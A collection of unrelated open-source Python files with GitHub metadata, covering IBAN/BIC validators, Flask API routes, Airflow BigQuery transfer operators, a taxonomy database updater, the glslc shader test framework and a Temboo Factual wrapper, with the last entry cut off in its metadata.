""" Returns check digits for an input IBAN number. Original checksum in input value is ignored. """
# 1. Move the two initial characters to the end of the string, replacing checksum for '00'
value = value[4:] + value[:2] + '00'
# 2. Replace each letter in the string with two digits, thereby expanding the string, where
# A = 10, B = 11, ..., Z = 35.
value_digits = ''
for x in value:
if '0' <= x <= '9':
value_digits += x
elif 'A' <= x <= 'Z':
value_digits += str(ord(x) - 55)
else:
raise ValidationError(_('%s is not a valid character for IBAN.') % x)
# 3. The remainder of the number above when divided by 97 is then subtracted from 98.
return '%02d' % (98 - int(value_digits) % 97)
def __call__(self, value):
"""
Validates the IBAN value using the official IBAN validation algorithm.
https://en.wikipedia.org/wiki/International_Bank_Account_Number#Validating_the_IBAN
"""
if value is None:
return value
value = value.upper().replace(' ', '').replace('-', '')
# Check that the total IBAN length is correct as per the country. If not, the IBAN is invalid.
country_code = value[:2]
if country_code in self.validation_countries:
if self.validation_countries[country_code] != len(value):
msg_params = {'country_code': country_code, 'number': self.validation_countries[country_code]}
raise ValidationError(_('%(country_code)s IBANs must contain %(number)s characters.') % msg_params)
else:
raise ValidationError(_('%s is not a valid country code for IBAN.') % country_code)
if self.include_countries and country_code not in self.include_countries:
raise ValidationError(_('%s IBANs are not allowed in this field.') % country_code)
if self.iban_checksum(value) != value[2:4]:
raise ValidationError(_('Not a valid IBAN.'))
@deconstructible
class BICValidator(object):
"""
A validator for SWIFT Business Identifier Codes (ISO 9362:2009). Validation is based on the BIC structure found on
wikipedia.
https://en.wikipedia.org/wiki/ISO_9362#Structure
"""
def __eq__(self, other):
# The is no outside modification of properties so this should always be true by default.
return True
def __call__(self, value):
if value is None:
return value
value = value.upper()
# Length is 8 or 11.
bic_length = len(value)
if bic_length != 8 and bic_length != 11:
raise ValidationError(_('BIC codes have either 8 or 11 characters.'))
# First 4 letters are A - Z.
institution_code = value[:4]
for x in institution_code:
if x not in string.ascii_uppercase:
raise ValidationError(_('%s is not a valid institution code.') % institution_code)
# Letters 5 and 6 consist of an ISO 3166-1 alpha-2 country code.
country_code = value[4:6]
if country_code not in ISO_3166_1_ALPHA2_COUNTRY_CODES:
raise ValidationError(_('%s is not a valid country code.') % country_code)
@deconstructible
class EANValidator(object):
"""
A generic validator for EAN like codes with the last digit being the checksum.
http://en.wikipedia.org/wiki/International_Article_Number_(EAN)
"""
message = _('Not a valid EAN code.')
def __init__(self, strip_nondigits=False, message=None):
if message is not None:
self.message = message
self.strip_nondigits = strip_nondigits
def __eq__(self, other):
return ((not hasattr(self, 'message') or self.message == other.message) and
self.strip_nondigits == other.strip_nondigits)
def __call__(self, value):
if value is None:
return value
if self.strip_nondigits:
value = re.compile(r'[^\d]+').sub('', value)
if not checksums.ean(value):
raise ValidationError(self.message, code='invalid')
|
{
"content_hash": "ee2c3804b2c6eb9c5204cf6c4d2b99a8",
"timestamp": "",
"source": "github",
"line_count": 260,
"max_line_length": 135,
"avg_line_length": 43.80769230769231,
"alnum_prop": 0.4906057945566286,
"repo_name": "agustin380/django-localflavor",
"id": "9605266794be1ffaaec7b79c58a29a01cc2a0c47",
"size": "11415",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "localflavor/generic/validators.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "814929"
}
],
"symlink_target": ""
}
|
from flask import Blueprint, url_for
api = Blueprint('api', __name__)
version = 'v1.0'
from . import mail, event, errors, utils
from .decorators import json
def endpoints():
"""Get the main endpoints for the RESTful API """
return {
'Retrieve the collection of all the email [GET]': url_for('api.get_mails', _external=True),
'Create a new email [POST]': url_for('api.new_mail', _external=True)
}
@api.route('/')
@json
def index():
"""Provide the version and the main endpoint """
return {'versions': {version: endpoints()}}
|
{
"content_hash": "835ff30b1fc6e74ea9aa2af2b4a0233d",
"timestamp": "",
"source": "github",
"line_count": 22,
"max_line_length": 99,
"avg_line_length": 25.727272727272727,
"alnum_prop": 0.6431095406360424,
"repo_name": "prisconapoli/mercury",
"id": "21547b0c7ac51a096bf035d2ac3764cf2e53ec6a",
"size": "566",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/api_1_0/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2413"
},
{
"name": "HTML",
"bytes": "6190"
},
{
"name": "Python",
"bytes": "50852"
},
{
"name": "Shell",
"bytes": "354"
}
],
"symlink_target": ""
}
|
"""
This module contains Google BigQuery Data Transfer Service operators.
"""
from typing import Optional, Sequence, Tuple
from google.api_core.retry import Retry
from google.protobuf.json_format import MessageToDict
from airflow.models import BaseOperator
from airflow.providers.google.cloud.hooks.bigquery_dts import BiqQueryDataTransferServiceHook, get_object_id
from airflow.utils.decorators import apply_defaults
class BigQueryCreateDataTransferOperator(BaseOperator):
"""
Creates a new data transfer configuration.
.. seealso::
For more information on how to use this operator, take a look at the guide:
:ref:`howto/operator:BigQueryCreateDataTransferOperator`
:param transfer_config: Data transfer configuration to create.
:type transfer_config: dict
:param project_id: The BigQuery project id where the transfer configuration should be
created. If set to None or missing, the default project_id from the GCP connection is used.
:type project_id: str
:param authorization_code: authorization code to use with this transfer configuration.
This is required if new credentials are needed.
:type authorization_code: Optional[str]
:param retry: A retry object used to retry requests. If `None` is
specified, requests will not be retried.
:type retry: Optional[google.api_core.retry.Retry]
:param timeout: The amount of time, in seconds, to wait for the request to
complete. Note that if retry is specified, the timeout applies to each individual
attempt.
:type timeout: Optional[float]
:param metadata: Additional metadata that is provided to the method.
:type metadata: Optional[Sequence[Tuple[str, str]]]
:param gcp_conn_id: The connection ID used to connect to Google Cloud Platform.
:type gcp_conn_id: str
"""
template_fields = (
"transfer_config",
"project_id",
"authorization_code",
"gcp_conn_id",
)
@apply_defaults
def __init__(
self,
transfer_config: dict,
project_id: Optional[str] = None,
authorization_code: Optional[str] = None,
retry: Retry = None,
timeout: Optional[float] = None,
metadata: Optional[Sequence[Tuple[str, str]]] = None,
gcp_conn_id="google_cloud_default",
*args,
**kwargs
):
super().__init__(*args, **kwargs)
self.transfer_config = transfer_config
self.authorization_code = authorization_code
self.project_id = project_id
self.retry = retry
self.timeout = timeout
self.metadata = metadata
self.gcp_conn_id = gcp_conn_id
def execute(self, context):
hook = BiqQueryDataTransferServiceHook(gcp_conn_id=self.gcp_conn_id)
self.log.info("Creating DTS transfer config")
response = hook.create_transfer_config(
project_id=self.project_id,
transfer_config=self.transfer_config,
authorization_code=self.authorization_code,
retry=self.retry,
timeout=self.timeout,
metadata=self.metadata,
)
result = MessageToDict(response)
self.log.info("Created DTS transfer config %s", get_object_id(result))
self.xcom_push(context, key="transfer_config_id", value=get_object_id(result))
return result
class BigQueryDeleteDataTransferConfigOperator(BaseOperator):
"""
Deletes transfer configuration.
.. seealso::
For more information on how to use this operator, take a look at the guide:
:ref:`howto/operator:BigQueryDeleteDataTransferConfigOperator`
:param transfer_config_id: Id of transfer config to be used.
:type transfer_config_id: str
:param project_id: The BigQuery project id where the transfer configuration should be
created. If set to None or missing, the default project_id from the GCP connection is used.
:type project_id: str
:param retry: A retry object used to retry requests. If `None` is
specified, requests will not be retried.
:type retry: Optional[google.api_core.retry.Retry]
:param timeout: The amount of time, in seconds, to wait for the request to
complete. Note that if retry is specified, the timeout applies to each individual
attempt.
:type timeout: Optional[float]
:param metadata: Additional metadata that is provided to the method.
:type metadata: Optional[Sequence[Tuple[str, str]]]
:param gcp_conn_id: The connection ID used to connect to Google Cloud Platform.
:type gcp_conn_id: str
"""
template_fields = ("transfer_config_id", "project_id", "gcp_conn_id")
@apply_defaults
def __init__(
self,
transfer_config_id: str,
project_id: Optional[str] = None,
retry: Retry = None,
timeout: Optional[float] = None,
metadata: Optional[Sequence[Tuple[str, str]]] = None,
gcp_conn_id="google_cloud_default",
*args,
**kwargs
):
super().__init__(*args, **kwargs)
self.project_id = project_id
self.transfer_config_id = transfer_config_id
self.retry = retry
self.timeout = timeout
self.metadata = metadata
self.gcp_conn_id = gcp_conn_id
def execute(self, context):
hook = BiqQueryDataTransferServiceHook(gcp_conn_id=self.gcp_conn_id)
hook.delete_transfer_config(
transfer_config_id=self.transfer_config_id,
project_id=self.project_id,
retry=self.retry,
timeout=self.timeout,
metadata=self.metadata,
)
class BigQueryDataTransferServiceStartTransferRunsOperator(BaseOperator):
"""
Start manual transfer runs to be executed now with schedule_time equal
to current time. The transfer runs can be created for a time range where
the run_time is between start_time (inclusive) and end_time
(exclusive), or for a specific run_time.
.. seealso::
For more information on how to use this operator, take a look at the guide:
:ref:`howto/operator:BigQueryDataTransferServiceStartTransferRunsOperator`
:param transfer_config_id: Id of transfer config to be used.
:type transfer_config_id: str
:param requested_time_range: Time range for the transfer runs that should be started.
If a dict is provided, it must be of the same form as the protobuf
message `~google.cloud.bigquery_datatransfer_v1.types.TimeRange`
:type requested_time_range: Union[dict, ~google.cloud.bigquery_datatransfer_v1.types.TimeRange]
:param requested_run_time: Specific run_time for a transfer run to be started. The
requested_run_time must not be in the future. If a dict is provided, it
must be of the same form as the protobuf message
`~google.cloud.bigquery_datatransfer_v1.types.Timestamp`
:type requested_run_time: Union[dict, ~google.cloud.bigquery_datatransfer_v1.types.Timestamp]
:param project_id: The BigQuery project id where the transfer configuration should be
created. If set to None or missing, the default project_id from the GCP connection is used.
:type project_id: str
:param retry: A retry object used to retry requests. If `None` is
specified, requests will not be retried.
:type retry: Optional[google.api_core.retry.Retry]
:param timeout: The amount of time, in seconds, to wait for the request to
complete. Note that if retry is specified, the timeout applies to each individual
attempt.
:type timeout: Optional[float]
:param metadata: Additional metadata that is provided to the method.
:type metadata: Optional[Sequence[Tuple[str, str]]]
:param gcp_conn_id: The connection ID used to connect to Google Cloud Platform.
:type gcp_conn_id: str
"""
template_fields = (
"transfer_config_id",
"project_id",
"requested_time_range",
"requested_run_time",
"gcp_conn_id",
)
@apply_defaults
def __init__(
self,
transfer_config_id: str,
project_id: Optional[str] = None,
requested_time_range: Optional[dict] = None,
requested_run_time: Optional[dict] = None,
retry: Retry = None,
timeout: Optional[float] = None,
metadata: Optional[Sequence[Tuple[str, str]]] = None,
gcp_conn_id="google_cloud_default",
*args,
**kwargs
):
super().__init__(*args, **kwargs)
self.project_id = project_id
self.transfer_config_id = transfer_config_id
self.requested_time_range = requested_time_range
self.requested_run_time = requested_run_time
self.retry = retry
self.timeout = timeout
self.metadata = metadata
self.gcp_conn_id = gcp_conn_id
def execute(self, context):
hook = BiqQueryDataTransferServiceHook(gcp_conn_id=self.gcp_conn_id)
self.log.info('Submitting manual transfer for %s', self.transfer_config_id)
response = hook.start_manual_transfer_runs(
transfer_config_id=self.transfer_config_id,
requested_time_range=self.requested_time_range,
requested_run_time=self.requested_run_time,
project_id=self.project_id,
retry=self.retry,
timeout=self.timeout,
metadata=self.metadata,
)
result = MessageToDict(response)
run_id = None
if 'runs' in result:
run_id = get_object_id(result['runs'][0])
self.xcom_push(context, key="run_id", value=run_id)
self.log.info('Transfer run %s submitted successfully.', run_id)
return result
|
{
"content_hash": "182e68897471df96231416ea0537f6b1",
"timestamp": "",
"source": "github",
"line_count": 236,
"max_line_length": 108,
"avg_line_length": 41.23728813559322,
"alnum_prop": 0.6642005754212906,
"repo_name": "mtagle/airflow",
"id": "0c904500a93aa9855e27f210606daeb1fd34a3db",
"size": "10519",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "airflow/providers/google/cloud/operators/bigquery_dts.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "13715"
},
{
"name": "Dockerfile",
"bytes": "17280"
},
{
"name": "HTML",
"bytes": "148492"
},
{
"name": "JavaScript",
"bytes": "25360"
},
{
"name": "Jupyter Notebook",
"bytes": "2933"
},
{
"name": "Mako",
"bytes": "1339"
},
{
"name": "Python",
"bytes": "10006634"
},
{
"name": "Shell",
"bytes": "217011"
},
{
"name": "TSQL",
"bytes": "879"
}
],
"symlink_target": ""
}
|
"""Script updating local taxonomy database.
Script allows to update local taxonomy database using new taxonomy dumps from
NCBI taxonomy database.
Requirements:
Names file - path to NCBI taxonomy dmp file containing mapping of s
scientific names onto Taxonomy ID's. Default is 'names.dmp'.
Nodes file - path to NCBI taxonomy dmp file containing node definitions with
tax id being mapped to a higher hierarchy node.
The default is 'nodes.dmp'.
Links file - path to a file containing protein id - taxonomy id mapping.
The default is - 'protein_taxonomy.lnk'
"""
# External libraries imports
from os import sys
# Internal modules import
import ncbi_taxonomies as ncbi
from taxonomydb import TaxDb
from own_objects import Node, ProteinLink
# Directory where all files from NCBI have been downloaded and extracted
ncbi_download = sys.argv[1]
def update_nodes(names_file=None, nodes_file=None):
"""Updates nodes collection of the database."""
# Paths to all required files.
print('Reading nodes...')
if not names_file:
names_file = '%s/names.dmp' % ncbi_download
if not nodes_file:
nodes_file = '%s/nodes.dmp' % ncbi_download
print('Updating nodes collection in the database...')
names = ncbi.read_names_dump(names_file)
nodes = ncbi.read_nodes_dump(nodes_file)
# Initialize connection with a database
database = TaxDb()
# Go through NCBI taxonomy dump records, update if record
# doesn't exist
for taxid, parent_taxid in nodes.iteritems():
# If given taxid record does not exist
# in a local database, create Node object
# and create document in a database
new_node = Node(taxid=taxid,
scientific_name=names[taxid],
upper_hierarchy=parent_taxid,)
database.add_record(node=new_node)
# Always disconnect the database!
database.disconnect()
print('Done!')
def update_links(links_file=None):
"""Light version of update links method"""
print('Reading links and updating local database...')
if not links_file:
links_file = '%s/prot.accession2taxid' % ncbi_download
database = TaxDb()
for link in ncbi.protein_taxid_links(file_path=links_file):
database.add_protein_link(link)
database.disconnect()
print('Done!')
if __name__ == "__main__":
update_links(links_file=sys.argv[1])
update_nodes()
|
{
"content_hash": "d8a72d7dcdd7887005cea18ca5a2f5b7",
"timestamp": "",
"source": "github",
"line_count": 86,
"max_line_length": 80,
"avg_line_length": 29.151162790697676,
"alnum_prop": 0.6657359393697646,
"repo_name": "mkorycinski/BioTaxIDMapper",
"id": "82f89235a253e715027ea7dba7692735073ef088",
"size": "2530",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "updatelocaldb.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "27012"
}
],
"symlink_target": ""
}
|
'''
Blueprint of the /organizations route.
This route will be registered in `server.py`.
'''
import os
import flask
import app.utilities.load as Load
from rq import Queue
from redis import Redis
from app.classes.ckan import CKAN
from app.functions.manage_queue import getStatus
from app.functions.fetch_store import fetchAndStore
ckan = CKAN().init()
REDIS_HOST = os.environ.get('REDIS_PORT_6379_TCP_ADDR')
blueprint_organizations = flask.Blueprint('organizations', __name__)
@blueprint_organizations.route('/organizations')
def computeOrganizations():
'''
Computes information about all organizations of a
CKAN instance.
'''
key = 'organizations'
status = getStatus(key)
queue = Queue(connection=Redis(host=REDIS_HOST), name=key)
objects = ckan.action.organization_list()
if status['empty']:
for object in objects:
job = queue.enqueue(fetchAndStore, key, object)
response = {
'success': True,
'message': 'Computing organization information. {n} before finished.'.format(n=status['count']),
'endpoint': key,
'time': None,
'ETA': None,
'computations': {
'total': len(objects),
'completed': len(objects) - status['count'],
'queued': status['count'],
'progress': round(((len(objects) - status['count']) / len(objects)) * 100, 2)
}
}
return flask.jsonify(**response)
|
{
"content_hash": "80bdcd647fbdf0011b244963b9160a62",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 104,
"avg_line_length": 28.62,
"alnum_prop": 0.6533892382948987,
"repo_name": "luiscape/hdx-monitor-sql-collect",
"id": "1c3ff266537c7e8841b7ba6a4f333c82427eadf9",
"size": "1473",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/routes/organizations.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "171"
},
{
"name": "Python",
"bytes": "49025"
},
{
"name": "Shell",
"bytes": "1094"
}
],
"symlink_target": ""
}
|
"""
WSGI config for PortFolio project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "PortFolio.settings")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
|
{
"content_hash": "a8cc7b4d2e3c4e5b522dde7e009f1152",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 79,
"avg_line_length": 40.714285714285715,
"alnum_prop": 0.8008771929824562,
"repo_name": "dubzzz/django-portfolio",
"id": "b985b3d306b0c90751d42f0e97d041c8148f689d",
"size": "1140",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "PortFolio/PortFolio/wsgi.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "16609"
},
{
"name": "JavaScript",
"bytes": "5879"
},
{
"name": "Python",
"bytes": "51658"
}
],
"symlink_target": ""
}
|
"""Manages and runs tests from the current working directory.
This will traverse the current working directory and look for python files that
contain subclasses of GlslCTest.
If a class has an @inside_glslc_testsuite decorator, an instance of that
class will be created and serve as a test case in that testsuite. The test
case is then run by the following steps:
1. A temporary directory will be created.
2. The glslc_args member variable will be inspected and all placeholders in it
will be expanded by calling instantiate_for_glslc_args() on placeholders.
The transformed list elements are then supplied as glslc arguments.
3. If the environment member variable exists, its write() method will be
invoked.
4. All expected_* member variables will be inspected and all placeholders in
them will be expanded by calling instantiate_for_expectation() on those
placeholders. After placeholder expansion, if the expected_* variable is
a list, its element will be joined together with '' to form a single
string. These expected_* variables are to be used by the check_*() methods.
5. glslc will be run with the arguments supplied in glslc_args.
6. All check_*() member methods will be called by supplying a TestStatus as
argument. Each check_*() method is expected to return a (Success, Message)
pair where Success is a boolean indicating success and Message is an error
message.
7. If any check_*() method fails, the error message is outputted and the
current test case fails.
If --leave-output was not specified, all temporary files and directories will
be deleted.
"""
import argparse
import fnmatch
import inspect
import os
import shutil
import subprocess
import sys
import tempfile
from collections import defaultdict
from placeholder import PlaceHolder
EXPECTED_BEHAVIOR_PREFIX = 'expected_'
VALIDATE_METHOD_PREFIX = 'check_'
def get_all_variables(instance):
"""Returns the names of all the variables in instance."""
return [v for v in dir(instance) if not callable(getattr(instance, v))]
def get_all_methods(instance):
"""Returns the names of all methods in instance."""
return [m for m in dir(instance) if callable(getattr(instance, m))]
def get_all_superclasses(cls):
"""Returns all superclasses of a given class. Omits root 'object' superclass.
Returns:
A list of superclasses of the given class. The order guarantees that
* A Base class precedes its derived classes, e.g., for "class B(A)", it
will be [..., A, B, ...].
* When there are multiple base classes, base classes declared first
precede those declared later, e.g., for "class C(A, B), it will be
[..., A, B, C, ...]
"""
classes = []
for superclass in cls.__bases__:
for c in get_all_superclasses(superclass):
if c is not object and c not in classes:
classes.append(c)
for superclass in cls.__bases__:
if superclass is not object and superclass not in classes:
classes.append(superclass)
return classes
def get_all_test_methods(test_class):
"""Gets all validation methods.
Returns:
A list of validation methods. The order guarantees that
* A method defined in superclass precedes one defined in subclass,
e.g., for "class A(B)", methods defined in B precedes those defined
in A.
* If a subclass has more than one superclass, e.g., "class C(A, B)",
then methods defined in A precedes those defined in B.
"""
classes = get_all_superclasses(test_class)
classes.append(test_class)
all_tests = [m for c in classes
for m in get_all_methods(c)
if m.startswith(VALIDATE_METHOD_PREFIX)]
unique_tests = []
for t in all_tests:
if t not in unique_tests:
unique_tests.append(t)
return unique_tests
class GlslCTest:
"""Base class for glslc test cases.
Subclasses define test cases' facts (shader source code, glslc command,
result validation), which will be used by the TestCase class for running
tests. Subclasses should define glslc_args (specifying glslc command
arguments), and at least one check_*() method (for result validation) for
a full-fledged test case. All check_*() methods should take a TestStatus
parameter and return a (Success, Message) pair, in which Success is a
boolean indicating success and Message is an error message. The test passes
iff all check_*() methods returns true.
Often, a test case class will delegate the check_* behaviors by inheriting
from other classes.
"""
def name(self):
return self.__class__.__name__
class TestStatus:
"""A struct for holding run status of a test case."""
def __init__(self, test_manager, returncode, stdout, stderr, directory, inputs, input_filenames):
self.test_manager = test_manager
self.returncode = returncode
self.stdout = stdout
self.stderr = stderr
# temporary directory where the test runs
self.directory = directory
# List of inputs, as PlaceHolder objects.
self.inputs = inputs
# the names of input shader files (potentially including paths)
self.input_filenames = input_filenames
class GlslCTestException(Exception):
"""GlslCTest exception class."""
pass
def inside_glslc_testsuite(testsuite_name):
"""Decorator for subclasses of GlslCTest.
This decorator checks that a class meets the requirements (see below)
for a test case class, and then puts the class in a certain testsuite.
* The class needs to be a subclass of GlslCTest.
* The class needs to have glslc_args defined as a list.
* The class needs to define at least one check_*() methods.
* All expected_* variables required by check_*() methods can only be
of bool, str, or list type.
* Python runtime will throw an exception if the expected_* member
attributes required by check_*() methods are missing.
"""
def actual_decorator(cls):
if not inspect.isclass(cls):
raise GlslCTestException('Test case should be a class')
if not issubclass(cls, GlslCTest):
raise GlslCTestException(
'All test cases should be subclasses of GlslCTest')
if 'glslc_args' not in get_all_variables(cls):
raise GlslCTestException('No glslc_args found in the test case')
if not isinstance(cls.glslc_args, list):
raise GlslCTestException('glslc_args needs to be a list')
if not any([
m.startswith(VALIDATE_METHOD_PREFIX)
for m in get_all_methods(cls)]):
raise GlslCTestException(
'No check_*() methods found in the test case')
if not all([
isinstance(v, (bool, str, list))
for v in get_all_variables(cls)]):
raise GlslCTestException(
'expected_* variables are only allowed to be bool, str, or '
'list type.')
cls.parent_testsuite = testsuite_name
return cls
return actual_decorator
class TestManager:
"""Manages and runs a set of tests."""
def __init__(self, executable_path, disassembler_path):
self.executable_path = executable_path
self.disassembler_path = disassembler_path
self.num_successes = 0
self.num_failures = 0
self.num_tests = 0
self.leave_output = False
self.tests = defaultdict(list)
def notify_result(self, test_case, success, message):
"""Call this to notify the manager of the results of a test run."""
self.num_successes += 1 if success else 0
self.num_failures += 0 if success else 1
counter_string = str(
self.num_successes + self.num_failures) + '/' + str(self.num_tests)
print('%-10s %-40s ' % (counter_string, test_case.test.name()) +
('Passed' if success else '-Failed-'))
if not success:
print(' '.join(test_case.command))
print(message)
def add_test(self, testsuite, test):
"""Add this to the current list of test cases."""
self.tests[testsuite].append(TestCase(test, self))
self.num_tests += 1
def run_tests(self):
for suite in self.tests:
print('Glslc test suite: "{suite}"'.format(suite=suite))
for x in self.tests[suite]:
x.runTest()
class TestCase:
"""A single test case that runs in its own directory."""
def __init__(self, test, test_manager):
self.test = test
self.test_manager = test_manager
self.inputs = [] # inputs, as PlaceHolder objects.
self.file_shaders = [] # filenames of shader files.
self.stdin_shader = None # text to be passed to glslc as stdin
def setUp(self):
"""Creates environment and instantiates placeholders for the test case."""
self.directory = tempfile.mkdtemp(dir=os.getcwd())
glslc_args = self.test.glslc_args
# Instantiate placeholders in glslc_args
self.test.glslc_args = [
arg.instantiate_for_glslc_args(self)
if isinstance(arg, PlaceHolder) else arg
for arg in self.test.glslc_args]
# Get all shader files' names
self.inputs = [arg for arg in glslc_args if isinstance(arg, PlaceHolder)]
self.file_shaders = [arg.filename for arg in self.inputs]
if 'environment' in get_all_variables(self.test):
self.test.environment.write(self.directory)
expectations = [v for v in get_all_variables(self.test)
if v.startswith(EXPECTED_BEHAVIOR_PREFIX)]
# Instantiate placeholders in expectations
for expectation_name in expectations:
expectation = getattr(self.test, expectation_name)
if isinstance(expectation, list):
expanded_expections = [
element.instantiate_for_expectation(self)
if isinstance(element, PlaceHolder) else element
for element in expectation]
setattr(
self.test, expectation_name,
''.join(expanded_expections))
elif isinstance(expectation, PlaceHolder):
setattr(self.test, expectation_name,
expectation.instantiate_for_expectation(self))
def tearDown(self):
"""Removes the directory if we were not instructed to do otherwise."""
if not self.test_manager.leave_output:
shutil.rmtree(self.directory)
def runTest(self):
"""Sets up and runs a test, reports any failures and then cleans up."""
self.setUp()
success = False
message = ''
try:
self.command = [self.test_manager.executable_path]
self.command.extend(self.test.glslc_args)
process = subprocess.Popen(
args=self.command, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
cwd=self.directory)
output = process.communicate(self.stdin_shader)
test_status = TestStatus(
self.test_manager,
process.returncode, output[0], output[1],
self.directory, self.inputs, self.file_shaders)
run_results = [getattr(self.test, test_method)(test_status)
for test_method in get_all_test_methods(
self.test.__class__)]
success, message = list(zip(*run_results))
success = all(success)
message = '\n'.join(message)
except Exception as e:
success = False
message = str(e)
self.test_manager.notify_result(self, success, message)
self.tearDown()
def main():
parser = argparse.ArgumentParser()
parser.add_argument('glslc', metavar='path/to/glslc', type=str, nargs=1,
help='Path to glslc')
parser.add_argument('spirvdis', metavar='path/to/glslc', type=str, nargs=1,
help='Path to spirv-dis')
parser.add_argument('--leave-output', action='store_const', const=1,
help='Do not clean up temporary directories')
parser.add_argument('--test-dir', nargs=1,
help='Directory to gather the tests from')
args = parser.parse_args()
default_path = sys.path
root_dir = os.getcwd()
if args.test_dir:
root_dir = args.test_dir[0]
manager = TestManager(args.glslc[0], args.spirvdis[0])
if args.leave_output:
manager.leave_output = True
for root, _, filenames in os.walk(root_dir):
for filename in fnmatch.filter(filenames, '*.py'):
if filename.endswith('unittest.py'):
# Skip unit tests, which are for testing functions of
# the test framework.
continue
sys.path = default_path
sys.path.append(root)
mod = __import__(os.path.splitext(filename)[0])
for _, obj, in inspect.getmembers(mod):
if inspect.isclass(obj) and hasattr(obj, 'parent_testsuite'):
manager.add_test(obj.parent_testsuite, obj())
manager.run_tests()
if manager.num_failures > 0:
sys.exit(-1)
if __name__ == '__main__':
main()
|
{
"content_hash": "4b9372d7e3b9a501b92aaac087d14069",
"timestamp": "",
"source": "github",
"line_count": 336,
"max_line_length": 101,
"avg_line_length": 40.169642857142854,
"alnum_prop": 0.6327331999703638,
"repo_name": "endlessm/chromium-browser",
"id": "3d4bc173989e9f1c77ebf55bbbe6bc2468fa93a4",
"size": "14125",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "third_party/shaderc/src/glslc/test/glslc_test_framework.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
}
|
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class FilterPlacesByTopLevelCategory(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the FilterPlacesByTopLevelCategory Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(FilterPlacesByTopLevelCategory, self).__init__(temboo_session, '/Library/Factual/FilterPlacesByTopLevelCategory')
def new_input_set(self):
return FilterPlacesByTopLevelCategoryInputSet()
def _make_result_set(self, result, path):
return FilterPlacesByTopLevelCategoryResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return FilterPlacesByTopLevelCategoryChoreographyExecution(session, exec_id, path)
class FilterPlacesByTopLevelCategoryInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the FilterPlacesByTopLevelCategory
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_APIKey(self, value):
"""
Set the value of the APIKey input for this Choreo. ((optional, string) The API Key provided by Factual (AKA the OAuth Consumer Key).)
"""
super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('APIKey', value)
def set_APISecret(self, value):
"""
Set the value of the APISecret input for this Choreo. ((optional, string) The API Secret provided by Factual (AKA the OAuth Consumer Secret).)
"""
super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('APISecret', value)
def set_Category(self, value):
"""
Set the value of the Category input for this Choreo. ((required, string) Enter a Factual top-level category to narrow the search results. See Choreo doc for a list of Factual top-level categories.)
"""
super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('Category', value)
def set_Latitude(self, value):
"""
Set the value of the Latitude input for this Choreo. ((required, decimal) Enter latitude coordinates of the location defining the center of the search radius.)
"""
super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('Latitude', value)
def set_Longitude(self, value):
"""
Set the value of the Longitude input for this Choreo. ((required, decimal) Enter longitude coordinates of the location defining the center of the search radius.)
"""
super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('Longitude', value)
def set_Query(self, value):
"""
Set the value of the Query input for this Choreo. ((optional, string) A search string (i.e. Starbucks))
"""
super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('Query', value)
def set_Radius(self, value):
"""
Set the value of the Radius input for this Choreo. ((required, integer) Provide the radius (in meters, and centered on the latitude-longitude coordinates specified) for which search results will be returned.)
"""
super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('Radius', value)
class FilterPlacesByTopLevelCategoryResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the FilterPlacesByTopLevelCategory Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((json) The response from Factual.)
"""
return self._output.get('Response', None)
class FilterPlacesByTopLevelCategoryChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return FilterPlacesByTopLevelCategoryResultSet(response, path)
|
{
"content_hash": "27ba23445153774466e3a58467ae58ad",
"timestamp": "",
"source": "github",
"line_count": 86,
"max_line_length": 216,
"avg_line_length": 48.96511627906977,
"alnum_prop": 0.7150320588933745,
"repo_name": "lupyuen/RaspberryPiImage",
"id": "3b4cee2960de02a840b14210d93702d7622db8aa",
"size": "5132",
